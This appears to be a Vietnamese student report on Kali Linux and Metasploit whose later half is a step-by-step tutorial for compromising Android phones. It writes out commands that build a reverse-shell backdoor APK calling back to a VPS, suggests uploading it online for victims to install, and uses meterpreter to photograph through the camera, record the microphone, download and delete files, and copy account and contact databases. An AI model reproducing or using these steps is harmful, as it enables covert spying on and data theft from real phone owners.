Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hành Debian, Kali đã dễ dàng hơn
trong việc âng cấp hệ thống khi phiên bản mới xuất hiện, người dùng không phải cài lại mới hoàn
toàn nữa.
3.2.Cài đặt Kali Linux
24. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
3.3.Metasploit framework trong Kali linux
3.3.1. Giới thiệu
Metasploit framework là một framework mã nguồn mở phát triển nhằm sử dụng các shellcode
(payload) để tấn công máy có lỗ hổng.Cùng với một số bộ công cụ bảo mật khác. Metasploit có
cơ sở dữ liệu chứa hàng ngàn shellcode,hàng ngàn exploit của các hệ điều hành,các chương trình
hay dịch vụ.Trong quá trình phát triển metasploit liên tục cập nhật các exploit... nên càng ngày nó
càng trở thành một bộ công cụ mạnh mẽ.
Metasploit framework là một bộ dự án sinh ra để kiểm tra độ an toàn, nhưng đối với những hacker
thì nó thực sự là một công cụ vô cùng hữu ích (dùng để kiểm tra, khai thác lỗi, exploit…)
3.3.2. Sử dụng metasploit framework
3.3.2.1.Chọn module exploit: lựa chọn chương trình, dịch vụ lỗi mà metasploit có hỗ trợ để
Trang 24
khai thác
Muốn chọn ta có thể dùng lệnh "show exploits" để hiện ra tất cả các exploit mà metasploit
framework có hỗ trợ.
Để dùng exploit nào đó ta dùng câu lệnh "use name_exploit" .Trong đó tham số name_exploit là
tên của exploit đc metasploit hỗ trợ.
Để biết thêm các thông tin về exploit mà ta đã chọn có thể dùng lệnh "info name_exploit".
Ví dụ: mình sử dụng một exploit sau khi đã liệt kê ra sẽ là:
use windows/manage/add_user_domain
3.3.2.2.Cấu hình module exploit đã chọn
Sau khi đã chọn một exploit với command use, việc tiếp theo là cấu hình các options mà exploit
này yêu cầu. Để rõ hơn exploit này nó yêu cầu cấu hình như thế nào, phải cấu hình những gì, ta sử
dụng lệnh "show options".
Khi sử dụng lệnh show option ta thường nhận đc một bảng gồm các cột như sau:
Name--------------Current Setting----------------Required---------------Description
Trong đó, ở cột required nếu giá trị là "yes" thì ta phải set giá trị cho tham số này, còn nếu là "no"
thì ta có thể set hoặc không. Quan trọng phải xem một số nó đã cấu hình mặc định cho rồi có
thích hợp với chúng ta hay không.
Ta dùng lệnh “set” để cấu hình những options của module đó.
Ngoài ra nó còn có thêm một số options khác,dùng "show advanced", "show evasion" để xem.
Sau khi cấu hình xong ta cần kiểm tra xem việc cấu hình đã đúng hay chưa. Để kiểm tra việc cấu
hình ta dùng lệnh "check" để xem mục tiêu có bị tấn công được hay không. Đây là một cách
25. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
nhanh để ta kiểm tra xem việt cấu hình các options bằng lệnh set có đúng hay không và mục tiêu
thực sự có lỗ hổng để khai thác được hay không. Nhưng không phải tất cả các exploit đều thực sự
có thể kiểm tra được bằng việc sự dụng lệnh check. Đôi khi ta phải thực sự exploit nó mới biết
được.
Trang 25
3.3.2.3.Lựa chọn payload
Payload là một đoạn code đc chạy trên máy victim, dùng để thực hiện một số họat động nào đó,
hoặc dùng để kết nối về máy của hacker.
Vậy làm sao để có cái payload này trên máy của victim? Có 2 phương pháp chủ yếu được dùng.
Đó là gửi cho victim thông qua việc phân tính một lỗi, lỗ hổng nào đó trên hệ thống victim, từ đó
đột nhập và đưa đoạn payload này vào máy victim. Kiểu thứ 2 là gửi trực tiếp cho victim, chờ đợi
victim sơ ý nhận nó.
Để hiện thị các payloads tích hợp cho exploit hiện tại chúng ta đang dùng, ta dùng lệnh "show
payloads".
Tương ứng với mỗi OS khác nhau ta dùng một payload khác nhau, và phương pháp cũng khác
nhau. Các giao thức dùng cũng khác nhau... Nhìn chung đối với payload có thể phân ra làm 2 loại
cơ bản đó là bind payload và reverse payload. Khi nào ta dùng loại nào? Đây cũng là một vấn đề
quan trọng. Nếu như máy của chúng ta (đóng vai trò là hacker) đứng sau một tường lửa, thì lúc
này ta nên dùng bind payload. Mở một port trên máy tính và kết nối trực tiếp từ máy hacker đến
máy victim. Còn nếu như victim đứng sau một tường lửa, còn chúng ta thì không. Khi đó chúng ta
dùng reverse payload để connect ngược từ máy victim về máy chúng ta. Như vậy cho thấy khi tấn
công mục tiêu, ta phải tìm hiểu rõ ràng về mục tiêu, tìm kiếm tất cả các thông tin có thể có. Dựa
vào đó mà ta chọn cách thích hợp.
Khi ta quyết định chọn một payload nào đó, dùng lệnh "set PAYLOAD name_payload" để chọn
payload cần dùng.
Giả sử muốn dùng payload windows/meterpreter/reverse_ord_tcp thì ta thao tác là:
set PAYLOAD windows/meterpreter/reverse_ord_tcp
Ta nhận đc là: PAYLOAD => windows/meterpreter/reverse_ord_tcp
Tượng tự để xem rõ thông tin, options về payload ta có thể dùng các lệnh như "show options",
"info name_payload" ,"show advanced",…
Sau khi thực hiện tất cả các thiết lập xong thì ta dùng lệnh "exploit" để xem kết quả.
3.4.Tấn công android dùng Metasploit Framework trong Kali Linux
26. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
Trước tiên chúng ta sẽ tạo ra một backdoor bằng cách dùng lệnh:
msfpayload android/meterpreter/reverse_tcp lhost=192.168.159.128 lport=8080 R >
/root/Desktop/app.apk
Trong đó 192.168.159.128 là địa chỉ ip của máy Kali.Chúng ta có thể xem nó bằng cách dùng
lệnh:
Trang 26
ifconfig
27. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
Và đây là file app.apk mà chúng ta vừa tạo
Tiếp theo chúng ta mở metasploit bằng cách dùng lệnh:
Trang 27
msfconsole
28. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
Chúng ta cài đặt các thông số cần thiết
Trang 28
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.159.128
set lport 8080
Với lhost và lport giống với khi chúng ta tạo file app.apk
Ta mở một cái android ảo và tải về file app.apk, cài đặt và mở lên được giao diện như dưới, nhấp
vào nút Reverse_tcp:
29. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
Vậy là ta đã kết nối thành công tới máy android này, ở msfconsole sẽ như sau:
Trang 29
Để xem thông tin về máy, nhập lệnh sysinfo
- Sử dụng camera:
Để xem danh sách camera, nhập webcam_list
30. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
Để chụp hình bằng camera, nhập webcam_snap a với a là id của camera xem ở danh sách camera
ở phần trước. Ví dụ như sau:
Trang 30
- Ghi âm
Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy
31. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
Trang 31
- Lấy file từ sd card
Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục
Ta tải file app.apk trong thư mục Download của sdcard
Dùng lệnh cd /sdcard/Download để vào thư mục
32. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
Như trên hình, ta thấy 1 file là app.apk, để tải về máy, ta nhập lệnh
Trang 32
download app.apk
Và file này sẽ được tải về thư mục root của máy Kali
4. Thực hiện xâm nhập android thông qua mạng Internet
4.1.Giới thiệu về VPS
4.1.1. VPS là gì?
Máy chủ ảo (Virtual Private Server -VPS) là phương pháp phân chia một máy chủ vật lý thành
nhiều máy chủ ảo. Trong khi trên một server chạy một Share Host thì có thể có hàng trăm tài
khoản chạy cùng lúc, nhưng trên server chạy VPS thì con số này chỉ bằng 1/10. Do vậy, VPS
có hiệu năng cao hơn Share Host rất nhiều.
Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng, có toàn quyền quản
lý root và có thể restart lại hệ thống bất cứ lúc nào. Do vậy, VPS hạn chế 100% khả năng bị
hack local.
Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung tài nguyên
server, nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ làm ảnh hưởng đến các Website
khác cùng server, riêng server VPS, một tài khoản trên VPS bị tấn công thì mọi tài khoản
khác trên VPS đều hoạt động bình thường.
33. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
VPS dành cho các doanh nghiệp vừa và những trang Web lớn hoặc mã nguồn nặng, nếu chạy
trên Share Host sẽ không đáp ứng đủ yêu cầu.Tuy nhiên, VPS đòi hỏi người sử dụng phải có
thêm một số kiến thức về bảo mật, cấu hình server,….
4.1.2. Đặc điểm về thông số VPS
Hoạt động hoàn toàn như một server riêng nên sở hữu một phần CPU riêng, dung lượng RAM
riêng, dung lượng ổ HDD riêng, địa chỉ IP riêng và hệ điều hành riêng.
Tiết kiệm được nhiều chi phí so với việc thuê một server riêng.
Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các ứng dụng khác thì
có thể cài đặt để thực hiện những yêu cầu riêng như truy cập Web bằng trình duyệt Web trên
VPS, dowload/upload bittorrent với tốc độ cao…
Trong trường hợp VPS bị thiếu tài nguyên thì có thể dễ dàng nâng cấp tài nguyên mà không
cần phải khởi động lại hệ thống.
Có thể cài lại hệ điều hành với thời gian từ 5-10 phút.
4.1.3. Giá trị khi sử dụng VPS
Server mạnh với nhiều cấu hình cho phép khách hàng dễ dàng lựa chọn gói VPS phù hợp.
Miễn phí chi phí cài đặt ban đầu cũng như cấu hình hoạt động cho khác hàng.
Hỗ trợ khác hàng cài đặt miễn phí thêm các phần mềm riêng.
Được cấu hình và cài đặt hệ thống Firewall và DDOS Protection.
Bộ phận kỹ thuật kịp thời can thiệp nhanh chóng nếu có sự cố phát sinh.
Trang 33
34. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
Trang 34
4.2.Cài đặt metasploit
Để cài đặt metasploit trước tiên ta phải vào trang http://metasploit.com để tải bộ cài đặt metasploit
về máy của mình. Ta nhấp vào phần Free Metasploit Download và nó sẽ hiện ra trang bên dưới
Ở đây mình sẽ down bản METASPLOIT COMMUNITY.
Sau khi nhấp vào link, nó sẽ xuất hiện một trang đăng kí. Mình nhập thông tin đầy đủ và nhấp vào
SUBMIT & DOWNLOAD để nhận một license
35. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
Tiếp theo nó sẽ xuất hiện trang download, ta sẽ chọn bản phù hợp.
Sau khi tải xong, ta bắt đầu tiến trình cài đặt. Trước tiên ta nhấp vào bản cài đặt và nhấn Next
Trang 35
36. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
Bên dưới ta chọn thư mục để cài đặt và nhấn Next
Ta phải đảm bảo rằng các phần mềm diệt virut đều được đóng, nếu không nó sẽ ngăn cản việc cài
đặt
Trang 36
37. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
SLL Port, Server Name và Days of validity ta để mặc định
Trang 37
Ta tiếp tục nhấn Next để bắt đầu cài đặt
38. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
Cài đặt xong ta nhấp Finish để kết thúc việc cài đặt
Sau khi kết thúc việc cài đặt, ta sẽ vào link http://localhost:3790/ để đăng kí tài khoản. Ta nhấp
đầy đủ theo những yêu cầu bên dưới và nhấn Create Account
Trang 38
39. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
Sau đó trình duyệt sẽ chuyển đến trang nhập key để active chương trình
Ta vào địa chỉ mail mà ta đã sử dụng khi download bộ cài đăt metasploit, điền key vào và nhấn
ACTIVE LICENSE
Trang 39
40. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
Trang 40
Như vậy là ta đã có một tài khoản metasploit
4.3.Xâm nhập vào thiết bị android
Trước tiên ta mở Terminal trong Kali Linux lên và gõ lệnh để tạo một backdoor:
msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.184 lport=4444 R>
/root/Desktop/app.apk
Trong đó 14.0.21.184 là địa chỉ máy VPS của ta.
/root/Desktop/app.apk là đường dẫn chứa file vừa tạo.
41. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
Sau khi tạo một backdoor được tạo, ta tải nó lên mạng.
Khi máy android down về cài đặt và truy cập vào thì sẽ hiện lên như bên dưới:
Ta vào máy VPS và mở Metasploit Console lên
Trang 41
42. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
Sau đó ta sẽ đánh các lệnh như bên dưới để tạo một môi trường và liên kết với máy android mà ta
sẽ tấn công:
Trang 42
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 14.0.21.184
set lport 4444
run
Ở đây lhost và lport phải giống với lhost và lport khi tạo backdoor
Khi máy android nhấp vào biểu tượng có chữ ReverseTCP thì sẽ có thông báo là đã kết nối
43. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
Ta gõ lệnh help để hiện lên các lệnh mà ta có thể sử dụng để hack android
Trang 43
- Xem thông tin
Ta dùng lệnh sysinfo để xem thông tin máy android
44. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
Trang 44
- Xem camera
Ta dùng lênh webcam_list để xem danh sách các camera
Ta dùng lệnh webcam_snap x để chụp một bức ảnh từ camera của máy android.
Trong đó: x là 1: Back Camera
2: Front Camera
Để di chuyển đến thư mục nào ta dùng lệnh
cd<đường dẫn đến thư mục>
Lệnh ls để xem trong thư mục có những gì
Ta vào thư mục /sdcard/Download để down file về
45. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
Trang 45
- Download file
Ta dùng lệnh download<tên file> để down file đó về máy VPS của ta
Muốn xóa một file ta dùng lệnh rm<tên file>
46. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
Trang 46
- Đánh cắp tài khoản, danh bạ
Để đánh cắp tài khoản trước tiên ta phải vào hệ thống của máy android. Lưu ý: máy android này
phải được root trước đó.
Ta dùng lệnh shell để vào hệ thống
Dùng lệnh su để toàn quyền truy cập
Dùng lệnh whoami để biết máy android đã được root chưa. Nếu rồi thì nó sẽ hiện thông báo là
unknown uid 0
Ta gõ cd /data/system để vào thư mục system
Tiếp theo gõ ls –l để xem trong thư mục có gì
47. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
Ta gõ lệnh cp accounts.db /sdcard để copy file accounts.db về Sdcard
Sau đó ta trở về meterpreter bằng lệnh exit rồi dùng lệnh
download file accounts.db về máy VPS của chúng ta
Trang 47
48. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
Trang 48
Tiếp tục ta vào địa chỉ
cd /data/data/com.android.providers.contacts/databases
Để copy file contacts2.db về Sdcard bằng lệnh
cp contacts2.db /sdcard
Sau đó ta download file contacts2.db về máy VPS
49. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
Ta mở file *.db bằng phần mềm SQLite. Ta có thể down phần mềm đó về vài cài vào VPS của
chúng ta
Trang 49